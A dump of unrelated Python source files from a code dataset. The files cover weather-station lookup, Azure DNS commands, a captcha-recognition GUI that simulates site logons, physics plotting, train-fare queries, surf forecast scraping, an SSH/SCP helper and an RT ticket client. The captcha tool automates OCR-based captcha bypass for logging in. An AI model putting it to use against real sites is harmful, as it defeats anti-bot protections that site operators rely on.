}))\n","sub_path":"app/room/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"271832287","text":"\"\"\" calculates the nearest weather station to a requested location\"\"\"\nfrom _datetime import datetime\nfrom typing import Union, Tuple, Optional\n\nimport numpy as np\nimport pandas as pd\nimport logging\nfrom scipy.spatial import cKDTree\n\nfrom wetterdienst.additionals.functions import (\n check_parameters,\n parse_enumeration_from_template,\n cast_to_list,\n)\nfrom wetterdienst.additionals.time_handling import parse_datetime\nfrom wetterdienst.data_models.coordinates import Coordinates\nfrom wetterdienst.enumerations.column_names_enumeration import DWDMetaColumns\nfrom wetterdienst.enumerations.parameter_enumeration import Parameter\nfrom wetterdienst.enumerations.period_type_enumeration import PeriodType\nfrom wetterdienst.enumerations.time_resolution_enumeration import TimeResolution\nfrom wetterdienst.exceptions import InvalidParameterCombination\nfrom wetterdienst.parse_metadata import metadata_for_climate_observations\n\nKM_EARTH_RADIUS = 6371\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_nearby_stations(\n latitude: float,\n longitude: float,\n minimal_available_date: Union[datetime, str],\n maximal_available_date: Union[datetime, str],\n parameter: Union[Parameter, str],\n time_resolution: Union[TimeResolution, str],\n period_type: Union[PeriodType, str],\n num_stations_nearby: Optional[int] = None,\n max_distance_in_km: Optional[float] = None,\n) -> pd.DataFrame:\n \"\"\"\n Provides a list of weather station ids for the requested data\n Args:\n latitude: latitude of location to search for nearest\n weather station\n longitude: longitude of location to search for nearest\n weather station\n minimal_available_date: Start date of timespan where measurements\n should be available\n maximal_available_date: End date of timespan where measurements\n should be available\n parameter: observation measure\n time_resolution: frequency/granularity of measurement interval\n period_type: recent or historical files\n num_stations_nearby: Number of stations that should be nearby\n max_distance_in_km: alternative filtering criteria, maximum\n distance to location in km\n\n Returns:\n DataFrames with valid Stations in radius per requested location\n\n \"\"\"\n if (num_stations_nearby and max_distance_in_km) and (\n num_stations_nearby and max_distance_in_km\n ):\n raise ValueError(\"Either set 'num_stations_nearby' or 'max_distance_in_km'.\")\n\n if num_stations_nearby == 0:\n raise ValueError(\"'num_stations_nearby' has to be at least 1.\")\n\n parameter = parse_enumeration_from_template(parameter, Parameter)\n time_resolution = parse_enumeration_from_template(time_resolution, TimeResolution)\n period_type = parse_enumeration_from_template(period_type, PeriodType)\n minimal_available_date = (\n minimal_available_date\n if isinstance(minimal_available_date, datetime)\n else parse_datetime(minimal_available_date)\n )\n maximal_available_date = (\n maximal_available_date\n if isinstance(maximal_available_date, datetime)\n else parse_datetime(maximal_available_date)\n )\n\n if not check_parameters(parameter, time_resolution, period_type):\n raise InvalidParameterCombination(\n f\"The combination of {parameter.value}, {time_resolution.value}, \"\n f\"{period_type.value} is invalid.\"\n )\n\n coords = Coordinates(np.array(latitude), np.array(longitude))\n\n metadata = metadata_for_climate_observations(\n parameter, time_resolution, period_type\n )\n\n metadata = metadata[\n (metadata[DWDMetaColumns.FROM_DATE.value] <= minimal_available_date)\n & (metadata[DWDMetaColumns.TO_DATE.value] >= maximal_available_date)\n ].reset_index(drop=True)\n\n # For distance filtering make normal query including all stations\n if max_distance_in_km:\n num_stations_nearby = metadata.shape[0]\n\n distances, indices_nearest_neighbours = _derive_nearest_neighbours(\n metadata.LAT.values, metadata.LON.values, coords, num_stations_nearby\n )\n\n # Require list of indices for consistency\n # Cast to np.array required for subset\n indices_nearest_neighbours = np.array(cast_to_list(indices_nearest_neighbours))\n distances_km = np.array(distances * KM_EARTH_RADIUS)\n\n # Filter for distance based on calculated distances\n if max_distance_in_km:\n _in_max_distance_indices = np.where(distances_km <= max_distance_in_km)[0]\n indices_nearest_neighbours = indices_nearest_neighbours[\n _in_max_distance_indices\n ]\n distances_km = distances_km[_in_max_distance_indices]\n\n metadata_location = metadata.loc[\n indices_nearest_neighbours\n if isinstance(indices_nearest_neighbours, (list, np.ndarray))\n else [indices_nearest_neighbours],\n :,\n ]\n metadata_location[\"DISTANCE_TO_LOCATION\"] = distances_km\n\n if metadata_location.empty:\n logger.warning(\n f\"No weather station was found for coordinate \"\n f\"{latitude}°N and {longitude}°E \"\n )\n\n return metadata_location\n\n\ndef _derive_nearest_neighbours(\n latitudes_stations: np.array,\n longitudes_stations: np.array,\n coordinates: Coordinates,\n num_stations_nearby: int = 1,\n) -> Tuple[Union[float, np.ndarray], np.ndarray]:\n \"\"\"\n A function that uses a k-d tree algorithm to obtain the nearest\n neighbours to coordinate pairs\n\n Args:\n latitudes_stations (np.array): latitude values of stations being compared to\n the coordinates\n longitudes_stations (np.array): longitude values of stations being compared to\n the coordinates\n coordinates (Coordinates): the coordinates for which the nearest neighbour\n is searched\n num_stations_nearby: Number of stations that should be nearby\n\n Returns:\n Tuple of distances and ranks of nearest to most distant stations\n \"\"\"\n points = np.c_[np.radians(latitudes_stations), np.radians(longitudes_stations)]\n distance_tree = cKDTree(points)\n return distance_tree.query(\n coordinates.get_coordinates_in_radians(), k=num_stations_nearby\n )\n\n\ndef stations_to_geojson(df: pd.DataFrame) -> dict:\n \"\"\"\n Convert DWD station information into GeoJSON format.\n\n Args:\n df: Input DataFrame containing station information.\n\n Return:\n Dictionary in GeoJSON FeatureCollection format.\n \"\"\"\n df = df.rename(columns=str.lower)\n\n features = []\n for _, station in df.iterrows():\n features.append(\n {\n \"type\": \"Feature\",\n \"properties\": {\n \"id\": station[\"station_id\"],\n \"name\": station[\"station_name\"],\n \"state\": station[\"state\"],\n \"from_date\": station[\"from_date\"].isoformat(),\n \"to_date\": station[\"to_date\"].isoformat(),\n \"has_file\": station[\"has_file\"],\n },\n \"geometry\": {\n # WGS84 is implied and coordinates represent decimal degrees ordered\n # as \"longitude, latitude [,elevation]\" with z expressed as metres\n # above mean sea level per WGS84.\n # -- http://wiki.geojson.org/RFC-001\n \"type\": \"Point\",\n \"coordinates\": [\n station[\"lon\"],\n station[\"lat\"],\n station[\"station_height\"],\n ],\n },\n }\n )\n\n return {\n \"type\": \"FeatureCollection\",\n \"features\": features,\n }\n","sub_path":"wetterdienst/additionals/geo_location.py","file_name":"geo_location.py","file_ext":"py","file_size_in_byte":7726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"50511334","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nfrom azure.cli.core.commands import CliCommandType\nfrom azext_dns._client_factory import (cf_dns_mgmt_zones)\n\n\ndef load_command_table(self, _):\n\n network_dns_zone_sdk = CliCommandType(\n operations_tmpl='azext_dns.dns.operations.zones_operations#ZonesOperations.{}',\n client_factory=cf_dns_mgmt_zones\n )\n\n with self.command_group('network dns zone', network_dns_zone_sdk) as g:\n g.custom_command('create', 'create_dns_zone', client_factory=cf_dns_mgmt_zones)\n g.generic_update_command('update', custom_func_name='update_dns_zone')\n","sub_path":"src/dns/azext_dns/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"545095765","text":"# -*- coding:utf-8 -*-\r\n#!/usr/bin/env python3\r\n\r\n\"\"\"\r\n\r\n\"\"\"\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtCore import QUrl, QByteArray\r\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView, QWebEnginePage\r\nfrom PyQt5.QtNetwork import QNetworkCookie\r\nfrom PyQt5.QtWidgets import QGridLayout\r\n\r\nfrom minghu6.graphic.captcha.get_image import get_image\r\nfrom minghu6.graphic.captcha.recognise import tesseract\r\nfrom minghu6.graphic.captcha.url_captcha import url_captcha_dict\r\n\r\nfrom minghu6.internet.simulate_logon import url_logon_dict\r\n\r\n\r\nclass Ui_MainWindow():\r\n\r\n def setupUi(self, MainWindow):\r\n\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.resize(803, 442)\r\n self.centralwidget = QtWidgets.QWidget(MainWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n\r\n #self.digit_captcha_label = QtWidgets.QLabel()\r\n #self.digit_captcha_label.setObjectName(\"digit_captcha_label\")\r\n\r\n #self.digit_captcha_lcd = QtWidgets.QLCDNumber()\r\n #self.digit_captcha_lcd.setObjectName(\"digit_captcha_lcd\")\r\n\r\n #self.digit_captcha_lcd.setFont(font)\r\n self.simulate_logon_btn = QtWidgets.QPushButton('simulate logon')\r\n\r\n\r\n self.raw_captcha_view = QtWidgets.QGraphicsView()\r\n self.raw_captcha_view.setObjectName(\"raw_captcha_view\")\r\n\r\n self.url_input_line = QtWidgets.QLineEdit()\r\n self.url_input_line.setObjectName(\"url_line\")\r\n\r\n self.url_input_label = QtWidgets.QLabel()\r\n self.url_input_label.setObjectName(\"url_label\")\r\n\r\n self.captcha_label = QtWidgets.QLabel()\r\n\r\n\r\n self.captcha_text = QtWidgets.QTextBrowser()\r\n\r\n\r\n font = QtGui.QFont()\r\n font.setBold(True)\r\n font.setItalic(True)\r\n font.setPixelSize(18)\r\n self.captcha_text.setFont(font)\r\n #self.other_captcha_text.append('abcde3')\r\n\r\n\r\n\r\n self.menubar = QtWidgets.QMenuBar(MainWindow)\r\n self.menubar.setObjectName(\"menubar\")\r\n\r\n self.menuMenu = QtWidgets.QMenu(self.menubar)\r\n self.menuMenu.setObjectName(\"menuMenu\")\r\n\r\n MainWindow.setMenuBar(self.menubar)\r\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n MainWindow.setStatusBar(self.statusbar)\r\n self.actionAuthor = QtWidgets.QAction(MainWindow)\r\n self.actionAuthor.setObjectName(\"actionAuthor\")\r\n self.menuMenu.addSeparator()\r\n self.menuMenu.addAction(self.actionAuthor)\r\n self.menubar.addAction(self.menuMenu.menuAction())\r\n\r\n\r\n self.retranslateUi(MainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n\r\n\r\n\r\n\r\n\r\n self.gridLayout = QGridLayout()\r\n\r\n self.browser = QWebEngineView()\r\n self.browser.setObjectName('browser')\r\n\r\n\r\n page = QWebEnginePage()\r\n self.browser.setPage(page)\r\n\r\n self.grid = self.gridLayout\r\n\r\n self.grid.addWidget(self.url_input_label, 0, 0)\r\n self.grid.addWidget(self.url_input_line, 1, 0, 1, 5)\r\n\r\n #self.grid.addWidget(self.url_grid, 0, 0)\r\n self.grid.addWidget(self.browser, 2, 0, 6, 1)\r\n self.grid.addWidget(self.raw_captcha_view, 2, 1, 1, 3)\r\n\r\n self.grid.addWidget(self.captcha_label, 3, 1)\r\n self.grid.addWidget(self.captcha_text, 3, 2)\r\n self.grid.addWidget(self.simulate_logon_btn, 5, 1, 3, 3)\r\n\r\n\r\n self.centralwidget.setLayout(self.gridLayout)\r\n MainWindow.setCentralWidget(self.centralwidget)\r\n\r\n self.setSlot()\r\n\r\n\r\n def setSlot(self):\r\n\r\n self.url_input_line.returnPressed.connect(self.url_input_line_func)\r\n self.simulate_logon_btn.clicked.connect(self.simulate_logon_func)\r\n def url_input_line_func(self):\r\n url = self.url_input_line.text()\r\n self.url = url\r\n with open('.url', 'w') as fr:\r\n fr.write(url)\r\n\r\n qurl = QUrl(url)\r\n\r\n\r\n #url_captcha = url_captcha_dict.get(url, url)\r\n # load url into browser frame\r\n if not hasattr(self, 'session_dict'):\r\n self.session_dict = {}\r\n #self.session_dict = {}\r\n session1 = self.session_dict.get(url, None)\r\n responseSet = url_captcha_dict[url](session=session1)\r\n\r\n url_captcha, url_session = responseSet[:2]\r\n self.params_dict = responseSet[-1]\r\n html = responseSet[2]\r\n\r\n\r\n _, imgPath = get_image(url_captcha, session=url_session)\r\n result = ''\r\n try:\r\n\r\n result = tesseract(imgPath, limit_config='letters_digits')\r\n #result = tesseract(url_captcha)\r\n except Exception as ex:\r\n print(ex)\r\n\r\n finally:\r\n self.result = result\r\n\r\n # update url:session\r\n self.session_dict[url] = url_session\r\n cookies1 = url_session.cookies.get_dict()\r\n #cookies1 = responseSet[2]\r\n\r\n\r\n\r\n scene = QtWidgets.QGraphicsScene()\r\n image=QtGui.QPixmap(imgPath)\r\n scene.addPixmap(image)\r\n self.raw_captcha_view.setScene(scene)\r\n\r\n self.captcha_text.clear() #\r\n self.captcha_text.setText(result)\r\n\r\n cookieStore = self.browser.page().profile().cookieStore()\r\n #cookieStore.deleteAllCookies()\r\n\r\n cookies2=QNetworkCookie()\r\n for name, value in cookies1.items():\r\n #print(name, value)\r\n cookies2.setName(name.encode())\r\n cookies2.setValue(value.encode())\r\n cookies2.setDomain(url)\r\n cookies2.setPath(url)\r\n\r\n cookieStore.setCookie(cookies2, qurl)\r\n\r\n\r\n #print(cookieStore.loadAllCookies())\r\n\r\n\r\n #self.browser.load(qurl)\r\n self.browser.setHtml(html, qurl)\r\n\r\n\r\n def simulate_logon_func(self):\r\n from minghu6.graphic.captcha.url_captcha import CAPTCHA_ID\r\n self.params_dict[CAPTCHA_ID] = self.result\r\n\r\n html = url_logon_dict[self.url](self.session_dict[self.url],\r\n **self.params_dict)\r\n\r\n self.browser.setHtml(html, QUrl(self.url))\r\n self.session_dict[self.url] = None\r\n\r\n def retranslateUi(self, MainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\r\n #self.digit_captcha_label.setText(_translate(\"MainWindow\", \"digit captcha\"))\r\n self.url_input_label.setText(_translate(\"MainWindow\", \"Url\"))\r\n self.captcha_label.setText(_translate(\"MainWindow\", \"catcha\"))\r\n self.menuMenu.setTitle(_translate(\"MainWindow\", \"Author\"))\r\n self.actionAuthor.setText(_translate(\"MainWindow\", \"庄&&刘&&冯\"))\r\n\r\n\r\ndef main():\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n MainWindow = QtWidgets.QMainWindow()\r\n ui = Ui_MainWindow()\r\n ui.setupUi(MainWindow)\r\n if len(sys.argv) > 1 and sys.argv[1]!='':\r\n ui.url = sys.argv[1]\r\n ui.url_input_line.setText(ui.url)\r\n ui.url_input_line_func()\r\n\r\n MainWindow.show()\r\n\r\n app.exec_()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"captcha_recognise_gui_controller.py","file_name":"captcha_recognise_gui_controller.py","file_ext":"py","file_size_in_byte":7241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"530541543","text":"\"\"\"\nMake various theory plots\n\"\"\"\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text', usetex=True)\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\n\n# 0 os or 1 ss\ntype = 0\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nif type ==0 : \n filenames = [\"data/z_peak_2charge_os.dat\",\"data/z_peak_3charge_os.dat\"]\nelse :\n filenames = [\"data/z_peak_2charge_ss.dat\",\"data/z_peak_3charge_ss.dat\"]\ncolours = [\"red\",\"blue\"]\nmarkers = [\"o\",\"x\"]\nlabels = [\"GSF track charge\",\"Unanimous charge\"]\n\nplots = []\n\nfor label,marker,colour,filename in zip(labels,markers,colours,filenames):\n file = open(filename,\"r\")\n x = []\n y = []\n for line in file:\n data = line.split(\",\")\n if data != [] : \n x.append(round(float(data[0])-0.5)+0.5) # round to nearest 0.5\n y.append(round(float(data[1])))\n yerr = np.sqrt(y)\n l = ax.errorbar(x, y, xerr=0.5, yerr=yerr, color=colour, fmt=marker, ms=5., label=label)\n plots.append(l)\n\nax.legend( loc='upper left', numpoints = 1 )\n\nif type ==0 : \n ax.set_xlabel(r'$m_{e^{\\pm}e^{\\mp}}~(GeV)$')\nelse:\n ax.set_xlabel(r'$m_{e^{\\pm}e^{\\pm}}~(GeV)$')\nax.set_ylabel(r'Events/GeV')\nax.set_ylim(0)\nax.set_xlim(60,120)\n#ax.grid(True)\n\nplt.show()\n\n","sub_path":"plot-z-peaks.py","file_name":"plot-z-peaks.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"378651585","text":"import json\nimport requests\nimport datetime\nfrom mailPackage.mailShoot import *\n\n\nsFile = open('/Users/louispierre.gavaud/PyCharmProjects/ticketeo/JSONtest/reqJSON2.json', 'r',encoding='utf-8').read()\n\njsonData=json.loads(sFile)\n\nurl=\"https://www.oui.sncf/proposition/rest/search-travels/outward\"\n\nreq=requests.post(url,json=jsonData)\nresults=json.loads(req.content.decode(\"utf-8\"))\n\ndTravels=[]\nif 'results' in results.keys():\n for travel in results['results']:\n dTravel={'pricing':{}}\n for tarif, dataTarif in travel['priceProposals'].items():\n dTravel[\"pricing\"][tarif]=dataTarif['amount']\n try:\n dTravel[\"departureDateTime\"] = datetime.datetime.strptime(travel['departureDate'], \"%Y-%m-%dT%H:%M:%S\")\n hoursDuration,minsDuration=divmod(travel['duration'] / 3600 / 1000 * 60, 60)\n dTravel[\"Time\"]=int(hoursDuration).__str__()+\":\"+int(minsDuration).__str__()\n except:\n print(\"no duration available\")\n\n dTravels.append(dTravel)\n\n","sub_path":"initialTest/testPOST.py","file_name":"testPOST.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"612561507","text":"'''\nlist = ['cóc', 'nho', 'xoài', 'ổi']\n\n# append thêm vào cuối\nlist.append('mận')\nprint(list)\n\n#\nlist.insert(0,'dưa hấu')\nprint(list)\n'''\n\n\n# bài 1\nlist = [1,2,3,4,5,6,7,8,9,10]\nprint(list)\nso_chan = []\nso_le = []\nn = len(list)\n\nprint('------------- Bài 1-----------------------')\nfor i in range(0,n):\n if(list[i] % 2 == 0):\n so_chan.append(list[i])\n else:\n so_le.append(list[i])\n\nfor i in range(len(so_chan)):\n print('list so chan :',so_chan[i])\nprint('------------------------------------')\nfor i in range(len(so_le)):\n print('list so le :',so_le[i])\n\n\n\n# list.pop() pop xóa phần từ cuối cùng\nprint('------------------------------------')\nchars = ['a', 'b', 'c']\nnumbers = [1,2,3]\nfor char, number in zip(chars, numbers):\n print(char, number)\n\n# Bài 2 | xóa phần từ khỏi list |\nprint('---------------Bài 2---------------------')\nstrings = input('Nhập vào chuỗi :')\nstring = strings.split(',')\nstring.sort()\nprint([i for i in string])\n\n","sub_path":"list_tuple.py","file_name":"list_tuple.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"555429478","text":"from django.shortcuts import render\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\n\n# Create your views here.\ndef get_soup(url):\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:10.0) Gecko/20100101 Firefox/10.0'}\n response = requests.get(url, headers=headers).text\n soup = BeautifulSoup(response, 'html.parser')\n souptext = soup.get_text()\n return souptext\n\ndef extract_swellnet_data(souptext):\n swell_data = []\n swell_data.append(re.findall(r'Surf: \\w+ \\d*-*\\d\\w+ \\w+', souptext))\n swell_data.append(re.findall(r'Winds: \\w+ \\w+', souptext))\n swell_data.append(re.findall(r'Weather: \\w+', souptext))\n swell_data.append(re.findall(r'Rating: \\d/\\d+', souptext))\n swell_data.append(re.findall(r'Updated: \\d+-\\d+-\\d+ \\d+:\\d+:\\d+', souptext))\n return swell_data\n\ndef extract_magicseaweed_data(souptext):\n swell_data = []\n raw_swell_data = re.findall(r'Current Conditions\\s+\\S+\\s+\\d\\w+ \\w+, .+', souptext)\n swell_data.append(re.findall(r'\\d*-*\\dft', raw_swell_data[0]))\n swell_data.append(re.findall(r'\\d\\w+ \\w+, \\w+/?\\w+?', raw_swell_data[0]))\n return swell_data\n\ndef extract_wind(souptext):\n wind = re.findall(r'Now\\s+\\d+.\\d+km/h\\s+[a-zA-Z]+', souptext)\n wind_data = re.findall(r'\\d+.\\d+km/h\\s+[a-zA-Z]+', wind[0])\n return wind_data\n\nmornington_report_swellnet = extract_swellnet_data(get_soup('http://www.swellnet.com/reports/australia/victoria/mornington-peninsula'))\nmornington_report_magicseaweed = extract_magicseaweed_data(get_soup('http://magicseaweed.com/Gunnamatta-Surf-Report/535/'))\nmornington_report_wind = extract_wind(get_soup('http://wind.willyweather.com.au/vic/mornington-peninsula/mornington.html'))\nphillip_report_swellnet = extract_swellnet_data(get_soup('http://www.swellnet.com/reports/australia/victoria/phillip-island'))\nphillip_report_magicseaweed = extract_magicseaweed_data(get_soup('http://magicseaweed.com/Phillip-Island-Surf-Report/536/'))\nphillip_report_wind = extract_wind(get_soup('http://wind.willyweather.com.au/vic/gippsland/phillip-island.html'))\ntorquay_report_swellnet = extract_swellnet_data(get_soup('http://www.swellnet.com/reports/australia/victoria/torquay'))\ntorquay_report_magicseaweed = extract_magicseaweed_data(get_soup('http://magicseaweed.com/Torquay-Surf-Report/525/'))\ntorquay_report_wind = extract_wind(get_soup('http://wind.willyweather.com.au/vic/barwon/torquay.html'))\n\ndef show_forecast(request):\n return render(request, 'forecast/forecast_detail.html',{'mp_sn':mornington_report_swellnet,\n 'mp_ms':mornington_report_magicseaweed,\n 'mp_ww':mornington_report_wind,\n 'pi_sn':phillip_report_swellnet,\n 'pi_ms':phillip_report_magicseaweed,\n 'pi_ww':phillip_report_wind,\n 't_sn':torquay_report_swellnet,\n 't_ms':torquay_report_magicseaweed,\n 't_ww':torquay_report_wind})\n","sub_path":"forecast/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"5921772","text":"#\n# Copyright (C) 2014 eNovance SAS \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom subprocess import Popen, PIPE\nfrom pwd import getpwnam\nfrom grp import getgrnam\nimport os\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef chown(path, user, group):\n uid = getpwnam(group).pw_uid\n gid = getgrnam(user).gr_gid\n os.chown(path, uid, gid)\n\n\nclass RemoteUser(object):\n def __init__(self, user, host, sshkey_path=None):\n self.opt = ['-o', 'LogLevel=ERROR', '-o', 'StrictHostKeyChecking=no',\n '-o', 'UserKnownHostsFile=/dev/null']\n if sshkey_path:\n self.opt = self.opt + ['-i', sshkey_path]\n self.host = '%s@%s' % (user, host)\n\n def _exe(self, cmd):\n logger.debug(cmd)\n p = Popen(cmd, stdout=PIPE, stderr=PIPE)\n stdout, stderr = p.communicate()\n logger.debug(\"Stdout:\\n%s\\n\\nStderr:\\n%s\\n\" % (stdout, stderr))\n p.wait()\n return p\n\n def _ssh(self, cmd):\n cmd = ['ssh'] + self.opt + [self.host] + cmd.split()\n return self._exe(cmd)\n\n def _scpFromRemote(self, src, dest):\n src = '%s:%s' % (self.host, src)\n cmd = ['scp'] + self.opt + [src, dest]\n return self._exe(cmd)\n\n def _scpToRemote(self, src, dest):\n dest = '%s:%s' % (self.host, dest)\n cmd = ['scp'] + self.opt + [src, dest]\n return self._exe(cmd)\n","sub_path":"managesf/controllers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"224610741","text":"\"\"\"A super minimal RT search client and parser for PSU Account reset requests\"\"\"\n\nimport logging\nimport requests\n\n\ndef get(query, credentials, url):\n \"\"\"Query RT via the API.\n query: the RTQL query\n credentials: a user, pass dict\n url: base RT url\"\"\"\n url = \"{}/search/ticket\".format(url)\n query_string = {'query': query, 'orderby': '-Created', 'format': 's'}\n response = requests.post(url, data=credentials, params=query_string)\n if response.ok:\n return parse_search(response.text)\n else:\n raise Exception(\"RT: Search Failed\")\n\n\ndef parse_search(response):\n \"\"\"Parse RT search results for account reset requests.\n response: an RT API response\"\"\"\n message = split_response(response)\n for req in message:\n # the ticket id is the first chunk before ': '\n ticket = req.split(': ')[0]\n # the account is the last word in req\n uid = req.split(' ')[-1]\n logging.debug('RT: Yielding ticket=%s and user=%s', ticket, uid)\n yield (ticket, uid)\n\n\ndef split_response(rt_response):\n \"\"\"RT sends it's own 'status' in addition to content.\n This function returns the message and raises an exception on failure\"\"\"\n response = rt_response.split('\\n')\n # This is the RT request status, not HTTP status per se\n if '200 Ok' in response[0]:\n # we skip the first and last lines in response as they're ''\n message = response[2:-1] # it may be possible to do [2:-2] here\n logging.info(\"RT: response='%s'\", message)\n return message\n else:\n raise Exception(\"RT: response indicates failure...\")\n\n\ndef comment(ticket, text, credentials, url):\n \"\"\"Post a comment to a ticket at the url\n ticket: ticket id\n comment: comment text\n credentials: a user, pass dict\n url: base RT url\"\"\"\n url = \"{0}/ticket/{1}/comment\".format(url, ticket)\n content = \"id: {0}\\nAction: comment\\nText: {1}\".format(ticket, text)\n post_data = credentials\n post_data['content'] = content\n response = requests.post(url, data=post_data)\n message = split_response(response.text)\n if 'Message recorded' in message[0]:\n return True\n else:\n return False\n\n\ndef edit(ticket, values, credentials, url):\n \"\"\"Edit a ticket\n ticket: ticket id\n values: a dict of ticket keys to update with corresponding values\n credentials: a user, pass dict\n url: base RT url\"\"\"\n url = \"{0}/ticket/{1}/edit\".format(url, ticket)\n post_data = credentials\n edits = list()\n for key in values.iterkeys():\n edits.append(\"{0}: {1}\".format(key, values[key]))\n post_data['content'] = \"\\n\".join(edits)\n response = requests.post(url, data=post_data)\n message = split_response(response.text)\n if 'updated' in message[0]:\n return True\n else:\n return False\n\n\ndef move(ticket, queue, credentials, url, unown=True):\n \"\"\"Move a ticket\n ticket: ticket id\n queue: the new queue for the ticket\n credentials: a user, pass dict\n url: base RT url\"\"\"\n values = {\"Queue\": queue}\n if unown:\n values['Owner'] = \"Nobody\"\n return edit(ticket, values, credentials, url)\n","sub_path":"rt.py","file_name":"rt.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"45111069","text":"\nfrom Task1 import task_1\nfrom Task2 import task_2,task_2_1,task_2_2\nfrom Task3 import task_3\nimport sys\n\n\ndef main(argv):\n if argv == '1':\n print('doing task 1.')\n history_1 = task_1()\n \n elif argv == '2':\n print('doing task 2.')\n history_2 = task_2()\n \n elif argv == '2_1':\n print('doing task 2_1.')\n history_2_1 = task_2_1()\n \n elif argv == '2_2':\n print('doing task 2_2.')\n history_2_2 = task_2_2()\n \n elif argv == '3':\n print('doing task 3.')\n history_3 = task_3() \n \n else:\n print('wrong task number')\n\n\nif __name__ == \"__main__\":\n #input in the console is the number of the task\n task = input(\"Enter the number of task to perform: \")\n main(task)","sub_path":"Lab5/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"167534825","text":"'''\nFor KIT103/KMA115 Practical 2: Working with sets\nRevised: 2015-07-14\n\nThis is not a 'real' database, but a script to provide you with some\nworking data (fictitious students spread across fictitious units).\n\nThe 'database' is a dictionary of student IDs mapped to dictionaries,\nwhich map field names (sid, given [name], family [name], and age) to\nthe values for that student.\n\nThe three unit enrolment sets are tik301, ikt130 and kti310. Rather\nthan typing these out each time, either create aliases for them, as in\ni = ikt130\nor type the first two letters and press Tab to get Spyder to complete it\nfor you.\n'''\n\nfrom matplotlib_venn import venn3\nfrom pylab import show\nfrom collections import Counter\ndef visualise_overlaps():\n '''Displays a Venn diagram of the number of students in each unit\n and the intersections between them.'''\n venn3([ikt130,kti310,tik301], set_labels=('IKT130', 'KTI310', 'TIK301'))\n show()\n\ndef display_student(student):\n '''Prints one student (dict structure) in fixed width columns.\n\n If you don't mind columns not lining up then it can be done more simply\n than this.\n '''\n print('{0:d} {1:<12} {2:<12} {3:d}'.format(student['sid'], student['family'], student['given'], student['age']))\n\ndef display_subset(sidset):\n '''Very basic printing of the subset of students.'''\n print('ID Family name Given name Age')\n print('---- ------------ ------------ ---')\n for sid in sidset:\n display_student(db[sid])\n\ndef display_all():\n '''Displays all student details.'''\n display_subset( list(db) ) #by default this takes the keys from the dict\n \n\n'''The 'database' of students and enrolments.'''\n\ndb = {\n 2167:{'sid':2167,'given':'Carlo','family':'Aponte','age':19},\n 6331:{'sid':6331,'given':'Missy','family':'Battin','age':19},\n 8860:{'sid':8860,'given':'Rhonda','family':'Billingsley','age':21},\n 3775:{'sid':3775,'given':'Reita','family':'Blaze','age':43},\n 5160:{'sid':5160,'given':'Truman','family':'Cooke','age':25},\n 9853:{'sid':9853,'given':'Reiko','family':'Coon','age':26},\n 4678:{'sid':4678,'given':'Evangelina','family':'Croley','age':24},\n 7419:{'sid':7419,'given':'Myrtice','family':'Cuevas','age':32},\n 6962:{'sid':6962,'given':'Leonie','family':'Dessert','age':23},\n 5031:{'sid':5031,'given':'Ardath','family':'Docherty','age':24},\n 1712:{'sid':1712,'given':'Micah','family':'Dockstader','age':41},\n 9494:{'sid':9494,'given':'Carletta','family':'Dolezal','age':36},\n 